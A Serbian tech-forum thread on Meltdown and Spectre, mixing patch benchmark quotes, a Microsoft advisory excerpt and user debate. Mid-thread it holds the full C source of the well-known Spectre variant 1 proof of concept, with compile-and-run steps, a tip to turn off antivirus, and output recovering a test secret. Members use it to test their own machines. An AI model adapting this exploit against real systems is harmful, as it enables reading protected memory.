Šta je novo?

Meltdown / Spectre



That said, five of the six tests here can push a quad-core, four-thread Intel CPU to full 100 per cent utilisation (the exception being Far Cry Primal, which relies heavily on single core power), but there is more leeway with the six-core i5 8400. What we found is that even with both patches in place, some games show no real difference at all - Ashes of the Singularity's punishing CPU benchmark remains completely consistent across all three of our test runs, as does our Notre Dame run through Assassin's Creed Unity, where any difference vanishes into the margin of error. The CPU-heavy Crysis 3 sails through the Meltdown test with no appreciable hit to performance, with the Spectre microcode update only hitting performance by two per cent. Far Cry Primal? Deduct 1fps for each of the security upgrades you install.

The Meltdown patch caused a 3.6 per cent hit to our test run through Rise of the Tomb Raider's Geothermal Valley, rising to 4.2 per cent with the BIOS update installed. However, our Witcher 3 test run - which hits storage hard and thrives on memory bandwidth - is hit comparatively hard, losing 8.2 per cent of its performance, rising to 9.4 per cent with the Spectre-orientated BIOS microcode update.

The good news is that performance is holding up: our tests here artificially push CPU performance to the forefront in a world where the GPU is the primary limiting factor in gaming. And even here, only one game sees an appreciable hit to performance and even that is in one part of a very well-optimised game that we've specifically chosen for CPU stress-testing. Most of The Witcher 3 plays much more smoothly

http://www.eurogamer.net/articles/d...-cpu-security-flaws-impact-gaming-performance
 
Poslednja izmena:
Da li će biti razlike u performansama u renderu i sličnim programima za posao (Adobe paket i programi za arhitekturu)?
Konkretno me za 7700K zanima.
 
Sve to pada u vodu, kad se pogleda ovako nešto:

miko.jpg
 
To je na kompu sto je "okrpljen" sa mikrokodovima i MS update? Intel ili AMD?
 
Ovo je Spectre.

Na slici je Windows 10 u VM, na nekoj MacBook mašini sa i5 i to sa macOS High Sierra 10.13.2 Supplemental Update koji je izašao pre dan-dva.

Autor je probao na istoj mašini, Linux, Windows, macOS, rezultat je isti.
 
Poslednja izmena:
Znači nisu zakrpili?

Sent from my Nexus 6P using Tapatalk
 
Mislim da nije pitanje, da li su zakrpili ne, već da li se može zakrpiti ili ne, sudeći po svemu.

Ako želite, možemo malo zabave u temi. :D

Kompajliranje nekog source-a koji odmah radi i tako to. :D

Da napišem i upustvo za sve i probaju na svojim mašinama?

Mogu i da okačim već kompajlirane, ali samo je na Vama, da li ćete verovati već kompajliranim ili ne.

Da li da okačim ili ne?
 
Poslednja izmena:
Kako stoje stvari, dzaba su krecili :(
 
Evo i ja sam isprobao taj spectre kod. Sa gcc kompajlerom i komandom gcc -std=c99 -O0 spectre.c -o spectre i posle /spectre.exe.
Ovako to izgleda na ovoj mojoj AMD makini i W7. uglavnom bih naglasio da bi eventualno morali da ugasite AV, jer meni 360 TS odmah brisne spectre.exe cim se stvori.
Default CACHE_HIT_THRESHOLD (80)
amd threshold 80 default.jpg
A ova druga je kad se poveca CACHE_HIT_THRESHOLD na 100 i onda sve pogadja. Znaci mora malo da se steluje kod.
amd threshold 100.jpg

EDIT: Eh da, zaboravio sam da naglasim da nemam instalirane nikakve zakrpe. A to nije ni moguce jer je MS povukao zakrpe za AMD jer puca Win nakon krpeza.
 
Poslednja izmena:
Ok, vidim da ima zainteresovanih. Pa, da prionemo na posao. :D

Kao što se vidi gore na slici, treba nam (neki) GCC za Windows.

Ja sam uzeo TDM-GCC, koji možete naći ovde:

https://sourceforge.net/projects/tdm-gcc/

Tokom instalacije, možete uzeti sve što je preporučeno i biće u folderu C:\TDM-GCC-64.

Taj folder sam i izabrao za rad, Vi možete bilo koji drugi.

U njemu napravite novi tekstualni fajl. Desni klik -> New -> Text Document.

Otvorite ga i u njega iskopirajte sledeći sadržaj:

Kod:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];

char * secret = "The Magic Words are Squeamish Ossifrage.";

unsigned int edx = 0;

uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */

void victim_function(size_t x) {
  if (x < array1_size) {
    temp &= array2[array1[x] * 512];
  }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (150) /* assume cache hit if time <= threshold */

int check_rdtscp() {
  __asm__ __volatile__ (
  "movl $0x80000001, %%eax\n"
  "cpuid\n"
  : "=d"(edx)
  :: "%eax", "%ebx", "%ecx"
  );
  return (edx&(1<<27));
}

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2], int has_rdtscp) {
  static int results[256];
  int tries, i, j, k, mix_i;
  unsigned int junk = 0;
  size_t training_x, x;
  register uint64_t time1, time2;
  volatile uint8_t * addr;
  volatile int z = 0;

  for (i = 0; i < 256; i++)
    results[i] = 0;
  for (tries = 999; tries > 0; tries--) {

    /* Flush array2[256*(0..255)] from cache */
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

    /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
    training_x = tries % array1_size;
    for (j = 29; j >= 0; j--) {
      _mm_clflush( & array1_size);
      for (z = 0; z < 100; z++) {} /* Delay (can also mfence) */

      /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
      /* Avoid jumps in case those tip off the branch predictor */
      x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
      x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
      x = training_x ^ (x & (malicious_x ^ training_x));

      /* Call the victim! */
      victim_function(x);

    }

    /* Time reads. Order is lightly mixed up to prevent stride prediction */
    for (i = 0; i < 256; i++) {
      mix_i = ((i * 167) + 13) & 255;
      addr = & array2[mix_i * 512];
      if (has_rdtscp) {
        time1 = __rdtscp(& junk); /* READ TIMER */
        junk = * addr; /* MEMORY ACCESS TO TIME */
        time2 = __rdtscp(& junk); /* READ TIMER & COMPUTE ELAPSED TIME */
      } else {
        time1 = __rdtsc(); /* READ TIMER */
        junk = * addr; /* MEMORY ACCESS TO TIME */
        time2 = __rdtsc(); /* READ TIMER & COMPUTE ELAPSED TIME */
      }
      if (time2 - time1 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++; /* cache hit - add +1 to score for this value */
    }

    /* Locate highest & second-highest results results tallies in j/k */
    j = k = -1;
    for (i = 0; i < 256; i++) {
      if (j < 0 || results[i] >= results[j]) {
        k = j;
        j = i;
      } else if (k < 0 || results[i] >= results[k]) {
        k = i;
      }
    }
    if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
      break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
  }
  results[0] ^= junk; /* use junk so code above won’t get optimized out*/
  value[0] = (uint8_t) j;
  score[0] = results[j];
  value[1] = (uint8_t) k;
  score[1] = results[k];
}

int main(int argc, const char * * argv) {
  size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
  int i, score[2], len = 40;
  uint8_t value[2], normalized[1];
  char * recovered = (char*)calloc(len + 1, sizeof(char*));
  const int has_rdtscp = check_rdtscp();

  for (i = 0; i < sizeof(array2); i++)
    array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
  if (argc == 3) {
    sscanf(argv[1], "%p", (void * * )( & malicious_x));
    malicious_x -= (size_t) array1; /* Convert input value into a pointer */
    sscanf(argv[2], "%d", & len);
  }

  printf("Reading %d bytes:\n", len);
  while (--len >= 0) {
    printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
    readMemoryByte(malicious_x++, value, score, has_rdtscp);
    printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
    normalized[0] = (value[0] > 31 && value[0] < 127) ? value[0] : (uint8_t)'?';
    recovered[strlen(recovered)] = normalized[0];
    printf("0x%02X=\'%c\' score=%d ", value[0], normalized[0], score[0]);
    if (score[1] > 0)
      printf("(second best: 0x%02X score=%d)", value[1], score[1]);
    printf("\n");
  }
  printf("\n");
  printf(" Original: %s\n", secret);
  printf("Recovered: %s\n", recovered);
  printf("\n");
  return (0);
}
Sačuvajte ga i promenite ime fajla u spectre.c.

Sad nam treba CMD. Pritisnite i držite levi Shift i istovremeno uradite desni klik. Dobićete opciju "Open command windows here". Ili jednostavno otvorite CMD i otiđite do Vašeg radnog foldera.

Kompajlirajte spectre.c sa:

Kod:
gcc -s -msse2 spectre.c -o spectre

ili

Kod:
gcc spectre.c -o spectre

Ako želite x86 verziju, odnosno 32bit-nu verziju, dodajte parametar:

Kod:
-m32

Dobićete u folderu spectre.exe.

Pokrenite spectre.exe u već otvorenom CMD-u, sa:

Kod:
spectre

ili:

Kod:
spectre.exe

Javite rezultat.

Ima još jedan source, ali taj ću postaviti, ako ovaj postavljeni ne radi nekome.

Autor source-a napominje da je TDM-GCC malo buggy, pa ako mislite da može bolje, slobodno preporučite.

Probajte u Linux-u, macOS-u, Windows-u...
 
Poslednja izmena:
I vazna stvar je da meni nije hteo da sljaka na gcc dok nisu uradjene sledece korekcije
dodat razmak
CACHE_HIT_THRESHOLD(80)
CACHE_HIT_THRESHOLD (80)
i zamenjeno
(value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0])
(value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0])
Ja sam koristio MinGW
 
Poslednja izmena:
Jeste.

Ali i tako, taj source ti i dalje ne daje ono što je nama razumljivo, a to su slova. :D Mada je hex rezultat isti, što je najbitnije.

Probaj ovaj gore, što sam postavio. ;)
 
Poslednja izmena:
Probao i ja na Fedori 27 sa 4.14.11 kernelom koji ovo ispravlja ali problem i dalje postoji.
 
Jeste.

Ali i tako, taj source ti i dalje ne daje ono što je nama razumljivo, a to su slova. :D Mada je hex rezultat isti, što je najbitnije.

Probaj ovaj gore, što sam postavio. ;)

A sta tu treba da pise, ili sta pise u hex-u?
 
Jeste.

Ali i tako, taj source ti i dalje ne daje ono što je nama razumljivo, a to su slova. :D Mada je hex rezultat isti, što je najbitnije.

Probaj ovaj gore, što sam postavio. ;)

Ma vide se slova samo gledaj u sredini (4.ti simbol), jer su okolo hijeroglifi pa se cini da ih nema. Na prvoj slici su sve ? u sredini. Znaci samo je problem sto zagrade ne prikazuje kako treba :-devil-:

A sta tu treba da pise, ili sta pise u hex-u?

The Magic Words are Squeamish Ossifrage.
 
Poslednja izmena:
Kapiram, ali sta bi to u stvari trebalo da pise, zbog cega se svi plase spectre, da li ti i koliko opterecen cpu dok ovo radi?
 
To je za sekund gotovo. Fazon je ako ovo programce uspe da pogodi sva slova, odnosno celu recenicu, da time jos uvek postoji spectre ranjivost.
A sta je to, ima nasiroko da se nadje vec na pocetku teme.
 
Poslednja izmena:
Ma vide se slova samo gledaj u sredini (4.ti simbol), jer su okolo hijeroglifi pa se cini da ih nema.

Vidi stvarno. :d

Smejem se i plačem, ne bih primetio, pa da me ubiješ. :d

U svakom slučaju, ovaj postavljeni ovde je mnogo pregledniji, pa nema takvih doskočica. :)

A sta tu treba da pise, ili sta pise u hex-u?

Misli se na ovo, podebljano i podvučeno:

Reading 40 bytes:
Reading at malicious_x = 0000000000000FF0... Success: 0x54='T' score=2
Reading at malicious_x = 0000000000000FF1... Success: 0x68='h' score=2
Reading at malicious_x = 0000000000000FF2... Success: 0x65='e' score=2
Reading at malicious_x = 0000000000000FF3... Success: 0x20=' ' score=2
Reading at malicious_x = 0000000000000FF4... Success: 0x4D='M' score=2
Reading at malicious_x = 0000000000000FF5... Success: 0x61='a' score=2
Reading at malicious_x = 0000000000000FF6... Success: 0x67='g' score=2
Reading at malicious_x = 0000000000000FF7... Success: 0x69='i' score=2
Reading at malicious_x = 0000000000000FF8... Success: 0x63='c' score=2
Reading at malicious_x = 0000000000000FF9... Success: 0x20=' ' score=2
Reading at malicious_x = 0000000000000FFA... Success: 0x57='W' score=2
Reading at malicious_x = 0000000000000FFB... Success: 0x6F='o' score=2
Reading at malicious_x = 0000000000000FFC... Success: 0x72='r' score=2
Reading at malicious_x = 0000000000000FFD... Success: 0x64='d' score=2
Reading at malicious_x = 0000000000000FFE... Success: 0x73='s' score=2
Reading at malicious_x = 0000000000000FFF... Success: 0x20=' ' score=2
Reading at malicious_x = 0000000000001000... Success: 0x61='a' score=2
Reading at malicious_x = 0000000000001001... Success: 0x72='r' score=2
Reading at malicious_x = 0000000000001002... Success: 0x65='e' score=2
Reading at malicious_x = 0000000000001003... Success: 0x20=' ' score=2
Reading at malicious_x = 0000000000001004... Success: 0x53='S' score=2
Reading at malicious_x = 0000000000001005... Success: 0x71='q' score=2
Reading at malicious_x = 0000000000001006... Success: 0x75='u' score=2
Reading at malicious_x = 0000000000001007... Success: 0x65='e' score=2
Reading at malicious_x = 0000000000001008... Success: 0x61='a' score=2
Reading at malicious_x = 0000000000001009... Success: 0x6D='m' score=2
Reading at malicious_x = 000000000000100A... Success: 0x69='i' score=2
Reading at malicious_x = 000000000000100B... Success: 0x73='s' score=2
Reading at malicious_x = 000000000000100C... Success: 0x68='h' score=2
Reading at malicious_x = 000000000000100D... Success: 0x20=' ' score=2
Reading at malicious_x = 000000000000100E... Success: 0x4F='O' score=2
Reading at malicious_x = 000000000000100F... Success: 0x73='s' score=2
Reading at malicious_x = 0000000000001010... Success: 0x73='s' score=2
Reading at malicious_x = 0000000000001011... Success: 0x69='i' score=2
Reading at malicious_x = 0000000000001012... Success: 0x66='f' score=2
Reading at malicious_x = 0000000000001013... Success: 0x72='r' score=2
Reading at malicious_x = 0000000000001014... Success: 0x61='a' score=2
Reading at malicious_x = 0000000000001015... Success: 0x67='g' score=2
Reading at malicious_x = 0000000000001016... Success: 0x65='e' score=2
Reading at malicious_x = 0000000000001017... Success: 0x2E='.' score=2

Original: The Magic Words are Squeamish Ossifrage.
Recovered: The Magic Words are Squeamish Ossifrage.
 
Poslednja izmena:
Znači nisu zakrpili?

Sent from my Nexus 6P using Tapatalk

Odgovor je:

9. Is my device protected after I’ve applied the Windows security updates Microsoft released on January 3, 2018?

To get all available protections for your device(s) against the three vulnerabilities described in this advisory, you must install the security updates for Windows and apply microcode updates provided by your hardware OEM.

If your OEM does not provide a microcode update, or if you are unable to apply it, the Windows security updates released on January 3, 2018 alone address:

CVE-2017-5753 - Bounds check bypass
CVE-2017-5754 - Rogue data cache load

To address CVE-2017-5715 - Branch target injection, you must apply a microcode update in conjunction with the Windows security update. Any questions regarding microcode updates must be directed to your OEM. Systems without updated microcode remain vulnerable to information disclosure as described in FAQ 9: What is the scope of the vulnerabilities?

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV180002
 
Poslednja izmena:
Ok, posto znamo da su svi zivi procesori pogodjeni ovim problemom, koji ne moze da se sredi nikakvim update-om ili OS-om, cekamo da Intel i ostali proizvodjaci donesu na svet novu generaciju cpu-a koji ce navodono biti imuni na ove probleme, i sa recenicom, ovo je nas novi sigurni proizvod, sa njime ste zasticeni i sigurni, stare mozete da bacite jer nisu sigurni, a novi mozete da dobijete za samo $999.99.
 
-1
Ja koristim Ryzen na PC-u i A-53 u telefonu. Tako da nisam mnogo pogođen, a tamo gde i jesam, problem se može rešiti bez većih problema (gubitaka). Odnosno, nema potrebe da menjam bilo šta, bar kada je sigurnost u pitanju :D Jedino što treba je da sačekam update, a imajući u vidu čije proizvode koristim (openSUSE, Nokia, MS), to će sigurno stići
 
Poslednja izmena:
-1
Ja koristim Ryzen na PC-u i A-53 u telefonu. Tako da nisam mnogo pogođen, a tamo gde i jesam, problem se može rešiti bez većih problema (gubitaka). Odnosno, nema potrebe da menjam bilo šta, bar kada je sigurnost u pitanju :D Jedino što treba je da sačekam update, a imajući u vidu čije proizvode koristim (openSUSE, Nokia, MS), to će sigurno stići

Ti kao pojedinac sto nisi pogodjen, to uopste nije vazno, ne radi se ovde o tebi, meni, nama, vec ostatku sveta, o ogromnom trzistu.
 
Ja ne azuriram nista dok ne ispeglaju ovo, deluje mi kao da gledaju posto poto da izbace nesto i pritom masu uredjaja zeznu, ne zna se ko gde bije sa azuriranjima, kao da nemaju medjusobnu komunikaciju.
 
@mirza82

Milioni pojedinaca su imali priliku da biraju šta će kupiti, baš kao i ja :D Ne znam kako je meni uspelo da sve što sam kupio u poslenjde 4 godine (2 CPU-a i 2 telefona) bude sigurnije od 90% uređaja. Tako i vi koji ste pogođeni, ne morate da kupujete novo, možete i staro :D

Šala mala, naravno da niko ne zna gde će sve otkriti rupa, ali kad je korisnicima jedino bitno cinebench ili geekbench rezultat, onda će i kompanije praviti procesore tako da taj rezultat bude prioritet.

Da se ne lažemo, kad je Skylake izašao, bilo je "Intel nam daje sve na kašičicu još od Sandy Bdrige-a". A sad kad je Skylake znatno bolje prošao od SB-a i Haswell-a sa ovim patch-evima niko ne govori "Ipak je Intel napravio nešto korisno"

I posle svega (Intel ME, Spectre/Meltdown, Intel AMT...), velika većina će i dalje smatrati da je Intel bolji izbor jer ima 10% veći FPS kada se upregne GTX 1080Ti u 1080p. Što je ok, ali nemoj posle da bude: "To nam namerno rade".

Ne kažem da će alternativni proizvod biti bolji sa aspekta sigurnosti, ali ako mi kao kupci pokažemo da nam je to bitnije od besmislenog CPU-Z testa, onda će svi proizvođači shvatiti to malo ozbiljnije. Naravno, nijedan CPU nikada neće biti 100% siguran, ali ako nas ne zanima sigurnost, zašto bi oni trošili više resursa nego što moraju
 
Jedini problem je, što je priroda Meltdown-a takva, da to jednostavno ne radiš. Ne praviš CPU da tako i radi. Ako i praviš, samo je pitanje dana, kad će to izaći na videlo.

What AMD didn’t spell out in detail is a minor difference in microarchitecture between Intel and AMD CPUs. When a CPU speculatively executes and crosses a privilege level boundary, any i*d*i*o*t would probably say that the CPU should see this crossing and not execute the following instructions that are out of it’s privilege level. This isn’t rocket science, just basic common sense.

Kao i sve kompanije, pa tako i Intel-u, se to isplatilo. Isplatilo u smislu, da kakva god šteta bude kasnije, ona će sasvim biti manja nego zarada.

Da se znalo, procurilo bi u javnost barem 10 godina prije.

Neko je čak i napisao knjigu o P4. :D

 
Poslednja izmena:
Ovo je tema o propustima, njihovim posledicama, kako ih zakrpiti i malo o tome kako ih testirati, a ne o teorijama zavere i ko je sta kada znao. Ko hoce da se bavi teorijama zavere, nek se preseli na neki durgi forum.
 
Nazad
Vrh Dno